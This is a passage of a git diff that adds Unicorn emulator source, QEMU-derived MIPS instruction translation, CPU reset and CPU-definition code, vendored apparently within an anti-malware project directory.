*/ + break; + case OPC_ALNV_PS: + case OPC_MADD_S: + case OPC_MADD_D: + case OPC_MADD_PS: + case OPC_MSUB_S: + case OPC_MSUB_D: + case OPC_MSUB_PS: + case OPC_NMADD_S: + case OPC_NMADD_D: + case OPC_NMADD_PS: + case OPC_NMSUB_S: + case OPC_NMSUB_D: + case OPC_NMSUB_PS: + gen_flt3_arith(ctx, op1, sa, rs, rd, rt); + break; + default: + MIPS_INVAL("cp3"); + generate_exception (ctx, EXCP_RI); + break; + } + } else { + generate_exception_err(ctx, EXCP_CpU, 1); + } + break; + +#if defined(TARGET_MIPS64) + /* MIPS64 opcodes */ + case OPC_LDL: case OPC_LDR: + case OPC_LLD: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_LWU: + case OPC_LD: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_ld(ctx, op, rt, rs, imm); + break; + case OPC_SDL: case OPC_SDR: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_SD: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_st(ctx, op, rt, rs, imm); + break; + case OPC_SCD: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_st_cond(ctx, op, rt, rs, imm); + break; + case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC, OPC_DADDI */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_BNVC, OPC_BNEZALC, OPC_BNEC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + /* OPC_DADDI */ + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_arith_imm(ctx, op, rt, rs, imm); + } + break; + case OPC_DADDIU: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_arith_imm(ctx, op, rt, rs, imm); + break; +#else + case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ + if (ctx->insn_flags & ISA_MIPS32R6) { + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + MIPS_INVAL("major opcode"); + generate_exception(ctx, EXCP_RI); + } + break; +#endif + case OPC_DAUI: /* OPC_JALX */ + if (ctx->insn_flags & ISA_MIPS32R6) { +#if defined(TARGET_MIPS64) + /* OPC_DAUI */ + check_mips_64(ctx); + if (rt != 0) { + TCGv t0 = tcg_temp_new(tcg_ctx); + 
gen_load_gpr(ctx, t0, rs); + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rt], t0, (uint32_t)imm << 16); + tcg_temp_free(tcg_ctx, t0); + } + MIPS_DEBUG("daui %s, %s, %04x", regnames[rt], regnames[rs], imm); +#else + generate_exception(ctx, EXCP_RI); + MIPS_INVAL("major opcode"); +#endif + } else { + /* OPC_JALX */ + check_insn(ctx, ASE_MIPS16 | ASE_MICROMIPS); + offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; + gen_compute_branch(ctx, op, 4, rs, rt, offset, 4); + } + break; + case OPC_MSA: /* OPC_MDMX */ + /* MDMX: Not implemented. */ + gen_msa(env, ctx); + break; + case OPC_PCREL: + check_insn(ctx, ISA_MIPS32R6); + gen_pcrel(ctx, rs, imm); + break; + default: /* Invalid */ + MIPS_INVAL("major opcode"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static inline void +gen_intermediate_code_internal(MIPSCPU *cpu, TranslationBlock *tb, + bool search_pc) +{ + CPUState *cs = CPU(cpu); + CPUMIPSState *env = &cpu->env; + DisasContext ctx; + target_ulong pc_start; + uint16_t *gen_opc_end; + CPUBreakpoint *bp; + int j, lj = -1; + int num_insns; + int max_insns; + int insn_bytes; + int is_slot = 0; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGArg *save_opparam_ptr = NULL; + bool block_full = false; + + if (search_pc) + qemu_log("search pc %d\n", search_pc); + + pc_start = tb->pc; + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + ctx.uc = env->uc; + ctx.pc = pc_start; + ctx.saved_pc = -1; + ctx.singlestep_enabled = cs->singlestep_enabled; + ctx.insn_flags = env->insn_flags; + ctx.CP0_Config1 = env->CP0_Config1; + ctx.tb = tb; + ctx.bstate = BS_NONE; + ctx.kscrexist = (env->CP0_Config4 >> CP0C4_KScrExist) & 0xff; + ctx.rxi = (env->CP0_Config3 >> CP0C3_RXI) & 1; + ctx.ie = (env->CP0_Config4 >> CP0C4_IE) & 3; + ctx.bi = (env->CP0_Config3 >> CP0C3_BI) & 1; + ctx.bp = (env->CP0_Config3 >> CP0C3_BP) & 1; + /* Restore delay slot state from the tb context. */ + ctx.hflags = (uint32_t)tb->flags; /* FIXME: maybe use 64 bits here? 
*/ + ctx.ulri = env->CP0_Config3 & (1 << CP0C3_ULRI); + restore_cpu_state(env, &ctx); +#ifdef CONFIG_USER_ONLY + ctx.mem_idx = MIPS_HFLAG_UM; +#else + ctx.mem_idx = ctx.hflags & MIPS_HFLAG_KSU; +#endif + num_insns = 0; + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) + max_insns = CF_COUNT_MASK; + LOG_DISAS("\ntb %p idx %d hflags %04x\n", tb, ctx.mem_idx, ctx.hflags); + + // Unicorn: early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + gen_tb_start(tcg_ctx); + gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env); + ctx.bstate = BS_EXCP; + goto done_generating; + } + + // Unicorn: trace this block on request + // Only hook this block if it is not broken from previous translation due to + // full translation cache + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + // save block address to see if we need to patch block size later + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } else { + env->uc->size_arg = -1; + } + + gen_tb_start(tcg_ctx); + while (ctx.bstate == BS_NONE) { + // printf(">>> mips pc = %x\n", ctx.pc); + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == ctx.pc) { + save_cpu_state(&ctx, 1); + ctx.bstate = BS_BRANCH; + gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_DEBUG); + /* Include the breakpoint location or the tb won't + * be flushed when it must be. 
*/ + ctx.pc += 4; + goto done_generating; + } + } + } + + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + tcg_ctx->gen_opc_pc[lj] = ctx.pc; + tcg_ctx->gen_opc_hflags[lj] = ctx.hflags & MIPS_HFLAG_BMASK; + tcg_ctx->gen_opc_btarget[lj] = ctx.btarget; + tcg_ctx->gen_opc_instr_start[lj] = 1; + tcg_ctx->gen_opc_icount[lj] = num_insns; + } + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) + // gen_io_start(); + + // Unicorn: end address tells us to stop emulation + if (ctx.pc == ctx.uc->addr_end) { + gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env); + ctx.bstate = BS_EXCP; + break; + } else { + bool insn_need_patch = false; + int insn_patch_offset = 1; + + // Unicorn: save param buffer + if (HOOK_EXISTS(env->uc, UC_HOOK_CODE)) + save_opparam_ptr = tcg_ctx->gen_opparam_ptr; + + is_slot = ctx.hflags & MIPS_HFLAG_BMASK; + + if (!(ctx.hflags & MIPS_HFLAG_M16)) { + ctx.opcode = cpu_ldl_code(env, ctx.pc); + insn_bytes = 4; + decode_opc(env, &ctx, &insn_need_patch, &insn_patch_offset); + } else if (ctx.insn_flags & ASE_MICROMIPS) { + ctx.opcode = cpu_lduw_code(env, ctx.pc); + insn_bytes = decode_micromips_opc(env, &ctx, &insn_need_patch); + } else if (ctx.insn_flags & ASE_MIPS16) { + ctx.opcode = cpu_lduw_code(env, ctx.pc); + insn_bytes = decode_mips16_opc(env, &ctx, &insn_need_patch); + } else { + generate_exception(&ctx, EXCP_RI); + ctx.bstate = BS_STOP; + break; + } + + // Unicorn: patch the callback for the instruction size + if (insn_need_patch) { + /* + int i; + for (i = 0; i < 30; i++) + printf("[%u] = %x\n", i, *(save_opparam_ptr + i)); + printf("\n"); + */ + *(save_opparam_ptr + insn_patch_offset) = insn_bytes; + } + } + + if (ctx.hflags & MIPS_HFLAG_BMASK) { + if (!(ctx.hflags & (MIPS_HFLAG_BDS16 | MIPS_HFLAG_BDS32 | + MIPS_HFLAG_FBNSLOT))) { + /* force to generate branch as there is neither delay nor + forbidden slot */ + is_slot = 1; + } + } + + if 
(is_slot) { + gen_branch(&ctx, insn_bytes); + } + ctx.pc += insn_bytes; + + num_insns++; + + /* Execute a branch and its delay slot as a single instruction. + This is what GDB expects and is consistent with what the + hardware does (e.g. if a delay slot instruction faults, the + reported PC is the PC of the branch). */ + if (cs->singlestep_enabled && (ctx.hflags & MIPS_HFLAG_BMASK) == 0) { + break; + } + + if ((ctx.pc & (TARGET_PAGE_SIZE - 1)) == 0) + break; + + if (tcg_ctx->gen_opc_ptr >= gen_opc_end) { + break; + } + + if (num_insns >= max_insns) + break; + + //if (singlestep) + // break; + } + + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns) { + block_full = true; + } + + //if (tb->cflags & CF_LAST_IO) { + // gen_io_end(); + //} + if (cs->singlestep_enabled && ctx.bstate != BS_BRANCH) { + save_cpu_state(&ctx, ctx.bstate != BS_EXCP); + gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_DEBUG); + } else { + switch (ctx.bstate) { + case BS_STOP: + gen_goto_tb(&ctx, 0, ctx.pc); + env->uc->next_pc = ctx.pc; + break; + case BS_NONE: + save_cpu_state(&ctx, 0); + gen_goto_tb(&ctx, 0, ctx.pc); + break; + case BS_EXCP: + tcg_gen_exit_tb(tcg_ctx, 0); + break; + case BS_BRANCH: + default: + break; + } + } +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } else { + tb->size = ctx.pc - pc_start; + tb->icount = num_insns; + } + + env->uc->block_full = block_full; +} + +void gen_intermediate_code (CPUMIPSState *env, struct TranslationBlock *tb) +{ + gen_intermediate_code_internal(mips_env_get_cpu(env), tb, false); +} + +void gen_intermediate_code_pc (CPUMIPSState *env, struct TranslationBlock *tb) +{ + gen_intermediate_code_internal(mips_env_get_cpu(env), tb, true); +} + +#if 0 +static void fpu_dump_state(CPUMIPSState *env, FILE *f, fprintf_function fpu_fprintf, + int flags) +{ 
+ int i; + int is_fpu64 = !!(env->hflags & MIPS_HFLAG_F64); + +#define printfpr(fp) \ + do { \ + if (is_fpu64) \ + fpu_fprintf(f, "w:%08x d:%016" PRIx64 \ + " fd:%13g fs:%13g psu: %13g\n", \ + (fp)->w[FP_ENDIAN_IDX], (fp)->d, \ + (double)(fp)->fd, \ + (double)(fp)->fs[FP_ENDIAN_IDX], \ + (double)(fp)->fs[!FP_ENDIAN_IDX]); \ + else { \ + fpr_t tmp; \ + tmp.w[FP_ENDIAN_IDX] = (fp)->w[FP_ENDIAN_IDX]; \ + tmp.w[!FP_ENDIAN_IDX] = ((fp) + 1)->w[FP_ENDIAN_IDX]; \ + fpu_fprintf(f, "w:%08x d:%016" PRIx64 \ + " fd:%13g fs:%13g psu:%13g\n", \ + tmp.w[FP_ENDIAN_IDX], tmp.d, \ + (double)tmp.fd, \ + (double)tmp.fs[FP_ENDIAN_IDX], \ + (double)tmp.fs[!FP_ENDIAN_IDX]); \ + } \ + } while(0) + + + fpu_fprintf(f, "CP1 FCR0 0x%08x FCR31 0x%08x SR.FR %d fp_status 0x%02x\n", + env->active_fpu.fcr0, env->active_fpu.fcr31, is_fpu64, + get_float_exception_flags(&env->active_fpu.fp_status)); + for (i = 0; i < 32; (is_fpu64) ? i++ : (i += 2)) { + fpu_fprintf(f, "%3s: ", fregnames[i]); + printfpr(&env->active_fpu.fpr[i]); + } + +#undef printfpr +} +#endif + +#if defined(TARGET_MIPS64) && defined(MIPS_DEBUG_SIGN_EXTENSIONS) +/* Debug help: The architecture requires 32bit code to maintain proper + sign-extended values on 64bit machines. 
*/ + +#define SIGN_EXT_P(val) ((((val) & ~0x7fffffff) == 0) || (((val) & ~0x7fffffff) == ~0x7fffffff)) + +static void +cpu_mips_check_sign_extensions (CPUMIPSState *env, FILE *f, + fprintf_function cpu_fprintf, + int flags) +{ + int i; + + if (!SIGN_EXT_P(env->active_tc.PC)) + cpu_fprintf(f, "BROKEN: pc=0x" TARGET_FMT_lx "\n", env->active_tc.PC); + if (!SIGN_EXT_P(env->active_tc.HI[0])) + cpu_fprintf(f, "BROKEN: HI=0x" TARGET_FMT_lx "\n", env->active_tc.HI[0]); + if (!SIGN_EXT_P(env->active_tc.LO[0])) + cpu_fprintf(f, "BROKEN: LO=0x" TARGET_FMT_lx "\n", env->active_tc.LO[0]); + if (!SIGN_EXT_P(env->btarget)) + cpu_fprintf(f, "BROKEN: btarget=0x" TARGET_FMT_lx "\n", env->btarget); + + for (i = 0; i < 32; i++) { + if (!SIGN_EXT_P(env->active_tc.gpr[i])) + cpu_fprintf(f, "BROKEN: %s=0x" TARGET_FMT_lx "\n", regnames[i], env->active_tc.gpr[i]); + } + + if (!SIGN_EXT_P(env->CP0_EPC)) + cpu_fprintf(f, "BROKEN: EPC=0x" TARGET_FMT_lx "\n", env->CP0_EPC); + if (!SIGN_EXT_P(env->lladdr)) + cpu_fprintf(f, "BROKEN: LLAddr=0x" TARGET_FMT_lx "\n", env->lladdr); +} +#endif + +void mips_tcg_init(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + TCGv **cpu_gpr; + int i; + + tcg_ctx->cpu_env = tcg_global_reg_new_ptr(uc->tcg_ctx, TCG_AREG0, "env"); + + if (!uc->init_tcg) { + for (i = 0; i < 32; i++) { + tcg_ctx->cpu_gpr[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_gpr[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.gpr[i]), + regnames[i]); + } + } + + cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGV_UNUSED(*cpu_gpr[0]); + + for (i = 0; i < 32; i++) { + int off = offsetof(CPUMIPSState, active_fpu.fpr[i].wr.d[0]); + tcg_ctx->msa_wr_d[i * 2] = + tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, off, msaregnames[i * 2]); + /* The scalar floating-point unit (FPU) registers are mapped on + * the MSA vector registers. 
*/ + tcg_ctx->fpu_f64[i] = tcg_ctx->msa_wr_d[i * 2]; + off = offsetof(CPUMIPSState, active_fpu.fpr[i].wr.d[1]); + tcg_ctx->msa_wr_d[i * 2 + 1] = + tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, off, msaregnames[i * 2 + 1]); + } + + if (!uc->init_tcg) + tcg_ctx->cpu_PC = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_PC) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.PC), "PC"); + + if (!uc->init_tcg) { + for (i = 0; i < MIPS_DSP_ACC; i++) { + tcg_ctx->cpu_HI[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_HI[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.HI[i]), + regnames_HI[i]); + tcg_ctx->cpu_LO[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_LO[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.LO[i]), + regnames_LO[i]); + } + } + + if (!uc->init_tcg) + tcg_ctx->cpu_dspctrl = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_dspctrl) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.DSPControl), + "DSPControl"); + + if (!uc->init_tcg) + tcg_ctx->bcond = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->bcond) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, bcond), "bcond"); + + if (!uc->init_tcg) + tcg_ctx->btarget = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->btarget) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, btarget), "btarget"); + + tcg_ctx->hflags = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, hflags), "hflags"); + + //tcg_ctx->fpu_fcr0 = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + // offsetof(CPUMIPSState, active_fpu.fcr0), + // "fcr0"); + tcg_ctx->fpu_fcr31 = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_fpu.fcr31), + "fcr31"); + uc->init_tcg = true; +} + +#include "translate_init.c" + +MIPSCPU *cpu_mips_init(struct uc_struct *uc, const char *cpu_model) +{ + MIPSCPU *cpu; + CPUMIPSState *env; + const mips_def_t *def; + + def = 
cpu_mips_find_by_name(cpu_model); + if (!def) + return NULL; + cpu = MIPS_CPU(uc, object_new(uc, TYPE_MIPS_CPU)); + env = &cpu->env; + env->cpu_model = def; + +#ifndef CONFIG_USER_ONLY + mmu_init(env, def); +#endif + fpu_init(env, def); + mvp_init(env, def); + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", NULL); + + return cpu; +} + +void cpu_state_reset(CPUMIPSState *env) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + /* Reset registers to their default values */ + env->CP0_PRid = env->cpu_model->CP0_PRid; + env->CP0_Config0 = env->cpu_model->CP0_Config0; +#ifdef TARGET_WORDS_BIGENDIAN + env->CP0_Config0 |= (1 << CP0C0_BE); +#endif + env->CP0_Config1 = env->cpu_model->CP0_Config1; + env->CP0_Config2 = env->cpu_model->CP0_Config2; + env->CP0_Config3 = env->cpu_model->CP0_Config3; + env->CP0_Config4 = env->cpu_model->CP0_Config4; + env->CP0_Config4_rw_bitmask = env->cpu_model->CP0_Config4_rw_bitmask; + env->CP0_Config5 = env->cpu_model->CP0_Config5; + env->CP0_Config5_rw_bitmask = env->cpu_model->CP0_Config5_rw_bitmask; + env->CP0_Config6 = env->cpu_model->CP0_Config6; + env->CP0_Config7 = env->cpu_model->CP0_Config7; + env->CP0_LLAddr_rw_bitmask = env->cpu_model->CP0_LLAddr_rw_bitmask + << env->cpu_model->CP0_LLAddr_shift; + env->CP0_LLAddr_shift = env->cpu_model->CP0_LLAddr_shift; + env->SYNCI_Step = env->cpu_model->SYNCI_Step; + env->CCRes = env->cpu_model->CCRes; + env->CP0_Status_rw_bitmask = env->cpu_model->CP0_Status_rw_bitmask; + env->CP0_TCStatus_rw_bitmask = env->cpu_model->CP0_TCStatus_rw_bitmask; + env->CP0_SRSCtl = env->cpu_model->CP0_SRSCtl; + env->current_tc = 0; + env->SEGBITS = env->cpu_model->SEGBITS; + env->SEGMask = (target_ulong)((1ULL << env->cpu_model->SEGBITS) - 1); +#if defined(TARGET_MIPS64) + if (env->cpu_model->insn_flags & ISA_MIPS3) { + env->SEGMask |= 3ULL << 62; + } +#endif + env->PABITS = env->cpu_model->PABITS; + env->PAMask = (target_ulong)((1ULL << env->cpu_model->PABITS) - 1); + 
env->CP0_SRSConf0_rw_bitmask = env->cpu_model->CP0_SRSConf0_rw_bitmask; + env->CP0_SRSConf0 = env->cpu_model->CP0_SRSConf0; + env->CP0_SRSConf1_rw_bitmask = env->cpu_model->CP0_SRSConf1_rw_bitmask; + env->CP0_SRSConf1 = env->cpu_model->CP0_SRSConf1; + env->CP0_SRSConf2_rw_bitmask = env->cpu_model->CP0_SRSConf2_rw_bitmask; + env->CP0_SRSConf2 = env->cpu_model->CP0_SRSConf2; + env->CP0_SRSConf3_rw_bitmask = env->cpu_model->CP0_SRSConf3_rw_bitmask; + env->CP0_SRSConf3 = env->cpu_model->CP0_SRSConf3; + env->CP0_SRSConf4_rw_bitmask = env->cpu_model->CP0_SRSConf4_rw_bitmask; + env->CP0_SRSConf4 = env->cpu_model->CP0_SRSConf4; + env->CP0_PageGrain_rw_bitmask = env->cpu_model->CP0_PageGrain_rw_bitmask; + env->CP0_PageGrain = env->cpu_model->CP0_PageGrain; + env->active_fpu.fcr0 = env->cpu_model->CP1_fcr0; + env->msair = env->cpu_model->MSAIR; + env->insn_flags = env->cpu_model->insn_flags; + +#if defined(CONFIG_USER_ONLY) + env->CP0_Status = (MIPS_HFLAG_UM << CP0St_KSU); +# ifdef TARGET_MIPS64 + /* Enable 64-bit register mode. */ + env->CP0_Status |= (1 << CP0St_PX); +# endif +# ifdef TARGET_ABI_MIPSN64 + /* Enable 64-bit address mode. */ + env->CP0_Status |= (1 << CP0St_UX); +# endif + /* Enable access to the CPUNum, SYNCI_Step, CC, and CCRes RDHWR + hardware registers. */ + env->CP0_HWREna |= 0x0000000F; + if (env->CP0_Config1 & (1 << CP0C1_FP)) { + env->CP0_Status |= (1 << CP0St_CU1); + } + if (env->CP0_Config3 & (1 << CP0C3_DSPP)) { + env->CP0_Status |= (1 << CP0St_MX); + } +# if defined(TARGET_MIPS64) + /* For MIPS64, init FR bit to 1 if FPU unit is there and bit is writable. */ + if ((env->CP0_Config1 & (1 << CP0C1_FP)) && + (env->CP0_Status_rw_bitmask & (1 << CP0St_FR))) { + env->CP0_Status |= (1 << CP0St_FR); + } +# endif +#else + if (env->hflags & MIPS_HFLAG_BMASK) { + /* If the exception was raised from a delay slot, + come back to the jump. 
*/ + env->CP0_ErrorEPC = env->active_tc.PC - 4; + } else { + env->CP0_ErrorEPC = env->active_tc.PC; + } + env->active_tc.PC = (int32_t)0xBFC00000; + env->CP0_Random = env->tlb->nb_tlb - 1; + env->tlb->tlb_in_use = env->tlb->nb_tlb; + env->CP0_Wired = 0; + env->CP0_EBase = (cs->cpu_index & 0x3FF); + env->CP0_EBase |= 0x80000000; + env->CP0_Status = (1 << CP0St_BEV) | (1 << CP0St_ERL); + /* vectored interrupts not implemented, timer on int 7, + no performance counters. */ + env->CP0_IntCtl = 0xe0000000; + { + int i; + + for (i = 0; i < 7; i++) { + env->CP0_WatchLo[i] = 0; + env->CP0_WatchHi[i] = 0x80000000; + } + env->CP0_WatchLo[7] = 0; + env->CP0_WatchHi[7] = 0; + } + /* Count register increments in debug mode, EJTAG version 1 */ + env->CP0_Debug = (1 << CP0DB_CNT) | (0x1 << CP0DB_VER); + + cpu_mips_store_count(env, 1); + + if (env->CP0_Config3 & (1 << CP0C3_MT)) { + int i; + + /* Only TC0 on VPE 0 starts as active. */ + for (i = 0; i < ARRAY_SIZE(env->tcs); i++) { + env->tcs[i].CP0_TCBind = cs->cpu_index << CP0TCBd_CurVPE; + env->tcs[i].CP0_TCHalt = 1; + } + env->active_tc.CP0_TCHalt = 1; + cs->halted = 1; + + if (cs->cpu_index == 0) { + /* VPE0 starts up enabled. */ + env->mvp->CP0_MVPControl |= (1 << CP0MVPCo_EVP); + env->CP0_VPEConf0 |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); + + /* TC0 starts up unhalted. */ + cs->halted = 0; + env->active_tc.CP0_TCHalt = 0; + env->tcs[0].CP0_TCHalt = 0; + /* With thread 0 active. 
*/ + env->active_tc.CP0_TCStatus = (1 << CP0TCSt_A); + env->tcs[0].CP0_TCStatus = (1 << CP0TCSt_A); + } + } + if (env->CP0_Config1 & (1 << CP0C1_FP)) { + env->CP0_Status |= (1 << CP0St_CU1); + } +#endif + if ((env->insn_flags & ISA_MIPS32R6) && + (env->active_fpu.fcr0 & (1 << FCR0_F64))) { + /* Status.FR = 0 mode in 64-bit FPU not allowed in R6 */ + env->CP0_Status |= (1 << CP0St_FR); + } + + /* MSA */ + if (env->CP0_Config3 & (1 << CP0C3_MSAP)) { + msa_reset(env); + } + + compute_hflags(env); + cs->exception_index = EXCP_NONE; +} + +void restore_state_to_opc(CPUMIPSState *env, TranslationBlock *tb, int pc_pos) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + env->active_tc.PC = tcg_ctx->gen_opc_pc[pc_pos]; + env->hflags &= ~MIPS_HFLAG_BMASK; + env->hflags |= tcg_ctx->gen_opc_hflags[pc_pos]; + switch (env->hflags & MIPS_HFLAG_BMASK_BASE) { + case MIPS_HFLAG_BR: + break; + case MIPS_HFLAG_BC: + case MIPS_HFLAG_BL: + case MIPS_HFLAG_B: + env->btarget = tcg_ctx->gen_opc_btarget[pc_pos]; + break; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate_init.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate_init.c new file mode 100644 index 0000000..7178d00 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate_init.c @@ -0,0 +1,948 @@ +/* + * MIPS emulation for qemu: CPU initialisation routines. + * + * Copyright (c) 2004-2005 Jocelyn Mayer + * Copyright (c) 2007 Herve Poussineau + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +/* CPU / CPU family specific config register values. */ + +/* Have config1, uncached coherency */ +#define MIPS_CONFIG0 \ + ((1U << CP0C0_M) | (0x2 << CP0C0_K0)) + +/* Have config2, no coprocessor2 attached, no MDMX support attached, + no performance counters, watch registers present, + no code compression, EJTAG present, no FPU */ +#define MIPS_CONFIG1 \ +((1U << CP0C1_M) | \ + (0 << CP0C1_C2) | (0 << CP0C1_MD) | (0 << CP0C1_PC) | \ + (1 << CP0C1_WR) | (0 << CP0C1_CA) | (1 << CP0C1_EP) | \ + (0 << CP0C1_FP)) + +/* Have config3, no tertiary/secondary caches implemented */ +#define MIPS_CONFIG2 \ +((1U << CP0C2_M)) + +/* No config4, no DSP ASE, no large physaddr (PABITS), + no external interrupt controller, no vectored interrupts, + no 1kb pages, no SmartMIPS ASE, no trace logic */ +#define MIPS_CONFIG3 \ +((0 << CP0C3_M) | (0 << CP0C3_DSPP) | (0 << CP0C3_LPA) | \ + (0 << CP0C3_VEIC) | (0 << CP0C3_VInt) | (0 << CP0C3_SP) | \ + (0 << CP0C3_SM) | (0 << CP0C3_TL)) +#define MIPS_CONFIG4 \ +((0 << CP0C4_M)) + +#define MIPS_CONFIG5 \ +((0 << CP0C5_M)) + +/* MMU types, the first four entries have the same layout as the + CP0C0_MT field. 
*/ +enum mips_mmu_types { + MMU_TYPE_NONE, + MMU_TYPE_R4000, + MMU_TYPE_RESERVED, + MMU_TYPE_FMT, + MMU_TYPE_R3000, + MMU_TYPE_R6000, + MMU_TYPE_R8000 +}; + +struct mips_def_t { + const char *name; + int32_t CP0_PRid; + int32_t CP0_Config0; + int32_t CP0_Config1; + int32_t CP0_Config2; + int32_t CP0_Config3; + int32_t CP0_Config4; + int32_t CP0_Config4_rw_bitmask; + int32_t CP0_Config5; + int32_t CP0_Config5_rw_bitmask; + int32_t CP0_Config6; + int32_t CP0_Config7; + target_ulong CP0_LLAddr_rw_bitmask; + int CP0_LLAddr_shift; + int32_t SYNCI_Step; + int32_t CCRes; + int32_t CP0_Status_rw_bitmask; + int32_t CP0_TCStatus_rw_bitmask; + int32_t CP0_SRSCtl; + int32_t CP1_fcr0; + int32_t MSAIR; + int32_t SEGBITS; + int32_t PABITS; + int32_t CP0_SRSConf0_rw_bitmask; + int32_t CP0_SRSConf0; + int32_t CP0_SRSConf1_rw_bitmask; + int32_t CP0_SRSConf1; + int32_t CP0_SRSConf2_rw_bitmask; + int32_t CP0_SRSConf2; + int32_t CP0_SRSConf3_rw_bitmask; + int32_t CP0_SRSConf3; + int32_t CP0_SRSConf4_rw_bitmask; + int32_t CP0_SRSConf4; + int32_t CP0_PageGrain_rw_bitmask; + int32_t CP0_PageGrain; + int insn_flags; + enum mips_mmu_types mmu_type; +}; + +/*****************************************************************************/ +/* MIPS CPU definitions */ +static const mips_def_t mips_defs[] = +{ + { + "4Kc", + 0x00018000, + MIPS_CONFIG0 | (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (0 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1278FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32, + MMU_TYPE_R4000, + }, + { + "4Km", + 0x00018300, + /* Config1 implemented, fixed mapping MMU, + no virtual icache, uncached coherency. 
